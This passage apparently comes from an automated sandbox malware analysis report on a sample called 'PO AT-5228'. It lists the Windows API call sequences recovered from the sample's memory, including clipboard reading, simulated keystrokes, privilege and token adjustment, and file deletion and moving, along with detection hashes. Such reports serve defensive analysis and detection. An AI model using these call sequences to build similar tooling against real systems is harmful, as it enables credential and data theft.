                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                                                        • String ID:
                                                                                        • API String ID: 1144279405-0
                                                                                        • Opcode ID: 0912a425f47b47eddfebc044e172a030f72b09f710aa1ea074f61d549a20c968
                                                                                        • Instruction ID: 147134143d6a900e466ccad5795befe01f53beea2dd9ab71c54b641870366a60
                                                                                        • Opcode Fuzzy Hash: 0912a425f47b47eddfebc044e172a030f72b09f710aa1ea074f61d549a20c968
                                                                                        • Instruction Fuzzy Hash: E0116D728456009FD7127FB49842B5D7BE1AF41336F2642D0E4345B1F2DBB48941DBA1
                                                                                        APIs
                                                                                        • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00BFDC00,00000000,?,00B6464E,00BFDC00,00010000,00000000,00000000,00000000,00000000), ref: 00B6C337
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: ced632bc9460a462cc144bf76db2f137b5352dc9265c41f8f2043037fc5a4fb0
                                                                                        • Instruction ID: f2ba87e30671fe7c4131147d95286c93a5221d05e5bfdf008bb0a26b3f82c2f4
                                                                                        • Opcode Fuzzy Hash: ced632bc9460a462cc144bf76db2f137b5352dc9265c41f8f2043037fc5a4fb0
                                                                                        • Instruction Fuzzy Hash: 80111531200B459FD720CE5AC880F6ABBE9EF55754F14C45EE9EA8AA50C7B9EC44CB60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                                        • Instruction ID: 7e85002a20a855e39b4c285449fd577056d890293370cc8d126557772e20b416
                                                                                        • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                                        • Instruction Fuzzy Hash: 79013671505109AECF05EFA4C8918EEBFF4EF21344F1080A6B565971A5EB309A49DF60
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 00B82AED
                                                                                          • Part of subcall function 00B87C0E: __getptd_noexit.LIBCMT ref: 00B87C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2597487223-0
                                                                                        • Opcode ID: bc45264666995bc420467f0c596508f2144717a576f66f74da597b39c57560bd
                                                                                        • Instruction ID: 546a3315dc3cfd79e5166f7681227a87a74065be5d0555a2a9eb73fc3a3184e0
                                                                                        • Opcode Fuzzy Hash: bc45264666995bc420467f0c596508f2144717a576f66f74da597b39c57560bd
                                                                                        • Instruction Fuzzy Hash: 88F06D31900605ABDF2ABF648C0679F3BE5BF00725F1584A5F8149B1B1DB78CA52EB51
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00B639FE,?,00000001), ref: 00B64286
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        • Opcode ID: be1c07a95b3b7405024d9af5ceebbdc525055d4896bf6fb16e7ac0e6881116e6
                                                                                        • Instruction ID: 3e39effb51a73849e8da12e4b7496fa546652ccc9a0a6f1ba65549f21809fdf1
                                                                                        • Opcode Fuzzy Hash: be1c07a95b3b7405024d9af5ceebbdc525055d4896bf6fb16e7ac0e6881116e6
                                                                                        • Instruction Fuzzy Hash: 1BF015B1515B02CFCB349F64D8A0856BBE4FF143253348ABEF1D686620C7769844DF50
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00B640C6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 82841172-0
                                                                                        • Opcode ID: 0c88a3b5f07e30303f068444f3df4d024c8662584345642ffac038440f3339c4
                                                                                        • Instruction ID: d8d7264ce119da7e18f34b60511ff26ad290074f360dc4cd7628c56e5ebfda1f
                                                                                        • Opcode Fuzzy Hash: 0c88a3b5f07e30303f068444f3df4d024c8662584345642ffac038440f3339c4
                                                                                        • Instruction Fuzzy Hash: A4E0C2366002245BC711A698CC86FFA77EDDF886A0F0901B5F909EB254DEA4AD819691
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock
                                                                                        • String ID:
                                                                                        • API String ID: 2638373210-0
                                                                                        • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                        • Instruction ID: 5e9cee0e25a9e01ef3599be8d289360b04516a1ceec96abc5acd865682d2fc9b
                                                                                        • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                                                                        • Instruction Fuzzy Hash: DDE092B0108B449BDB348A24D800BE373E0EB06305F00085DF2EB83242EB627841C759
                                                                                        APIs
                                                                                        • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00BD40EA,00000000,00000000,00000000), ref: 00B647A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: e836c7a63c1d4fc4d846019e967498f6e20969226406ce5092c727887720be7a
                                                                                        • Instruction ID: e90ac8bb424743feb428c53adefcf76b64a80982e56079a347ea849628c5d1d2
                                                                                        • Opcode Fuzzy Hash: e836c7a63c1d4fc4d846019e967498f6e20969226406ce5092c727887720be7a
                                                                                        • Instruction Fuzzy Hash: 75D0C974640208BFEB04CB91DC86F9A7BBCEB04718F600194F600AA2D0D6F2BE408B55
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1694924142.000000000195D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0195D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_195d000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction ID: d2169cc1755888a4df458d8d6310cfec26cde84963550e3580b6b67e7512072f
                                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                        • Instruction Fuzzy Hash: 6FE0E67494010EEFDB00EFB4D54969E7FB4EF04301F100261FD05E2281D6309D508A62
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00BCF87D
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BCF8DC
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BCF919
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BCF940
                                                                                        • SendMessageW.USER32 ref: 00BCF966
                                                                                        • _wcsncpy.LIBCMT ref: 00BCF9D2
                                                                                        • GetKeyState.USER32(00000011), ref: 00BCF9F3
                                                                                        • GetKeyState.USER32(00000009), ref: 00BCFA00
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BCFA16
                                                                                        • GetKeyState.USER32(00000010), ref: 00BCFA20
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BCFA4F
                                                                                        • SendMessageW.USER32 ref: 00BCFA72
                                                                                        • SendMessageW.USER32(?,00001030,?,00BCE059), ref: 00BCFB6F
                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00BCFB85
                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00BCFB96
                                                                                        • SetCapture.USER32(?), ref: 00BCFB9F
                                                                                        • ClientToScreen.USER32(?,?), ref: 00BCFC03
                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00BCFC0F
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00BCFC29
                                                                                        • ReleaseCapture.USER32 ref: 00BCFC34
                                                                                        • GetCursorPos.USER32(?), ref: 00BCFC69
                                                                                        • ScreenToClient.USER32(?,?), ref: 00BCFC76
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BCFCD8
                                                                                        • SendMessageW.USER32 ref: 00BCFD02
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BCFD41
                                                                                        • SendMessageW.USER32 ref: 00BCFD6C
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00BCFD84
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00BCFD8F
                                                                                        • GetCursorPos.USER32(?), ref: 00BCFDB0
                                                                                        • ScreenToClient.USER32(?,?), ref: 00BCFDBD
                                                                                        • GetParent.USER32(?), ref: 00BCFDD9
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BCFE3F
                                                                                        • SendMessageW.USER32 ref: 00BCFE6F
                                                                                        • ClientToScreen.USER32(?,?), ref: 00BCFEC5
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BCFEF1
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BCFF19
                                                                                        • SendMessageW.USER32 ref: 00BCFF3C
                                                                                        • ClientToScreen.USER32(?,?), ref: 00BCFF86
                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00BCFFB6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00BD004B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                        • String ID: @GUI_DRAGID$F
                                                                                        • API String ID: 2516578528-4164748364
                                                                                        • Opcode ID: 9fb2cbff531c5bc148485ae3d691ac68699eaaeac005323b61e0635ea3f648f4
                                                                                        • Instruction ID: a4f6a18a383b61ddc13dce76f611df4590d486bcae97abb683c853cc668869ba
                                                                                        • Opcode Fuzzy Hash: 9fb2cbff531c5bc148485ae3d691ac68699eaaeac005323b61e0635ea3f648f4
                                                                                        • Instruction Fuzzy Hash: AC329874604246EFDB20CF24C884FAABBE6FB49354F1806AEFA95872A1C771DC05CB51
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00BCB1CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: %d/%02d/%02d
                                                                                        • API String ID: 3850602802-328681919
                                                                                        • Opcode ID: 0800842ba406c56e348d977171c00c1487d0a6df1bad51614ffbe123f8956d9e
                                                                                        • Instruction ID: 49033d2accf0f6c3398f3b80474a12eecda2c30830dd994cf35c4d609d02e825
                                                                                        • Opcode Fuzzy Hash: 0800842ba406c56e348d977171c00c1487d0a6df1bad51614ffbe123f8956d9e
                                                                                        • Instruction Fuzzy Hash: DF12BC71600248AFEB259F64CC8AFAE7BF8EF45714F1441ADF919EB290DBB08941CB51
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 00B7EB4A
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BD3AEA
                                                                                        • IsIconic.USER32(000000FF), ref: 00BD3AF3
                                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00BD3B00
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00BD3B0A
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BD3B20
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BD3B27
                                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00BD3B33
                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00BD3B44
                                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00BD3B4C
                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00BD3B54
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00BD3B57
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD3B6C
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00BD3B77
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD3B81
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00BD3B86
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD3B8F
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00BD3B94
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BD3B9E
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 00BD3BA3
                                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00BD3BA6
                                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00BD3BCD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 4125248594-2988720461
                                                                                        • Opcode ID: a93c22246e27ecf47a7267f26ba4dbce8f924c8bdd118ffbc04d97914b45bc65
                                                                                        • Instruction ID: 7d8a0c94841165705e52374f6205162c9bb3579fcac00390b7e9687ead8619bb
                                                                                        • Opcode Fuzzy Hash: a93c22246e27ecf47a7267f26ba4dbce8f924c8bdd118ffbc04d97914b45bc65
                                                                                        • Instruction Fuzzy Hash: 02318371A403587FEB205B658C89F7F7EACEB44B50F104066FA05EB2D1DAF15D00AAA1
                                                                                        APIs
                                                                                          • Part of subcall function 00B9B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B9B180
                                                                                          • Part of subcall function 00B9B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B9B1AD
                                                                                          • Part of subcall function 00B9B134: GetLastError.KERNEL32 ref: 00B9B1BA
                                                                                        • _memset.LIBCMT ref: 00B9AD08
                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B9AD5A
                                                                                        • CloseHandle.KERNEL32(?), ref: 00B9AD6B
                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B9AD82
                                                                                        • GetProcessWindowStation.USER32 ref: 00B9AD9B
                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 00B9ADA5
                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B9ADBF
                                                                                          • Part of subcall function 00B9AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B9ACC0), ref: 00B9AB99
                                                                                          • Part of subcall function 00B9AB84: CloseHandle.KERNEL32(?,?,00B9ACC0), ref: 00B9ABAB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                        • String ID: $default$winsta0
                                                                                        • API String ID: 2063423040-1027155976
                                                                                        • Opcode ID: 02cba09199fdd5b1fa30bfffb8070736969a3b1f4d393a116b1045ff821d800f
                                                                                        • Instruction ID: a3dad2f4c8354905c0269fe348cad7c1b34152a8d9444713054c5c1fee629e20
                                                                                        • Opcode Fuzzy Hash: 02cba09199fdd5b1fa30bfffb8070736969a3b1f4d393a116b1045ff821d800f
                                                                                        • Instruction Fuzzy Hash: AB81AE71900249AFDF11DFA4DC85AEEBBB9FF04304F2441A9F814A7161DB718E54DBA1
                                                                                        APIs
                                                                                          • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00BA5FA6,?), ref: 00BA6ED8
                                                                                          • Part of subcall function 00BA6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00BA5FA6,?), ref: 00BA6EF1
                                                                                          • Part of subcall function 00BA725E: __wsplitpath.LIBCMT ref: 00BA727B
                                                                                          • Part of subcall function 00BA725E: __wsplitpath.LIBCMT ref: 00BA728E
                                                                                          • Part of subcall function 00BA72CB: GetFileAttributesW.KERNEL32(?,00BA6019), ref: 00BA72CC
                                                                                        • _wcscat.LIBCMT ref: 00BA6149
                                                                                        • _wcscat.LIBCMT ref: 00BA6167
                                                                                        • __wsplitpath.LIBCMT ref: 00BA618E
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00BA61A4
                                                                                        • _wcscpy.LIBCMT ref: 00BA6209
                                                                                        • _wcscat.LIBCMT ref: 00BA621C
                                                                                        • _wcscat.LIBCMT ref: 00BA622F
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00BA625D
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00BA626E
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00BA6289
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00BA6298
                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00BA62AD
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00BA62BE
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BA62E1
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BA62FD
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BA630B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 1917200108-1173974218
                                                                                        • Opcode ID: a5511be55b630da0a7453cba63871d19c2acd932e1d4b6c9fe4fd7c551dab842
                                                                                        • Instruction ID: 95af64256169a5a7254ec29deeab4ae536d8d91651ab9a300ad389a20c76143c
                                                                                        • Opcode Fuzzy Hash: a5511be55b630da0a7453cba63871d19c2acd932e1d4b6c9fe4fd7c551dab842
                                                                                        • Instruction Fuzzy Hash: 5F5100B280C25C6ACB21EB95CC84EEB77FCAF05300F0905E6E545E3141DE769B498F94
                                                                                        APIs
                                                                                        • OpenClipboard.USER32(00BFDC00), ref: 00BB6B36
                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00BB6B44
                                                                                        • GetClipboardData.USER32(0000000D), ref: 00BB6B4C
                                                                                        • CloseClipboard.USER32 ref: 00BB6B58
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00BB6B74
                                                                                        • CloseClipboard.USER32 ref: 00BB6B7E
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00BB6B93
                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00BB6BA0
                                                                                        • GetClipboardData.USER32(00000001), ref: 00BB6BA8
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00BB6BB5
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00BB6BE9
                                                                                        • CloseClipboard.USER32 ref: 00BB6CF6
                                                                                        Memory Dump Source
